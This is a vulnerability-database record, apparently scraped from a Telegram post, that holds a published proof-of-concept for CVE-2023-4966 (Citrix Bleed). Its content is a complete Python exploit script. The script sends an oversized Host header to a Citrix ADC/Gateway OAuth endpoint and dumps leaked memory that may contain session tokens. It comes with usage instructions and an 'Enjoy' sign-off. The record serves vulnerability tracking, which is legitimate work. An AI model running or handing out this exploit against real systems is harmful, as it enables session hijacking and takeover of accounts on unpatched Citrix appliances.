{"uuid": "04e6c835-65f3-49d3-89f5-8596d3dfac3e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2023-4966", "type": "published-proof-of-concept", "source": "https://t.me/poxek/3329", "content": "Exploit for Citrix Bleed: Leaking Session Tokens\nCVE-2023-4966\n\nEnjoy \ud83d\ude09\nExploit:\n#!/usr/bin/env python3\n\nimport sys\nimport requests\nimport urllib3\nimport argparse\nurllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)\n\nparser = argparse.ArgumentParser()\nparser.add_argument('--target', help='The Citrix ADC / Gateway target, excluding the protocol (e.g. 192.168.1.200)')\nargs = parser.parse_args()\n\nif args.target is None:\n    print('Target must be provided (e.g. --target 192.168.1.200)')\n    sys.exit(0)\n\nhostname = args.target\n\nif __name__ == \"__main__\":\n    headers = {\n        \"Host\": \"a\"*24576\n    }\n    r = requests.get(f\"https://{hostname}/oauth/idp/.well-known/openid-configuration\", headers=headers, verify=False,timeout=10)\n    if r.status_code == 200:\n        print(\"--- Dumped Memory ---\")\n        print(r.text[131050:])\n        print(\"---      End      ---\")\n    else:\n        print(\"Could not dump memory\")\n\nUsage:\npython exploit.py --target TARGET\n\n\ud83d\udcbb Github\n\n\u27a1\ufe0f Research\n\n\ud83d\udcf9 YouTube PoC\n\n\ud83c\udf1a @poxek", "creation_timestamp": "2023-10-25T07:46:11.000000Z"}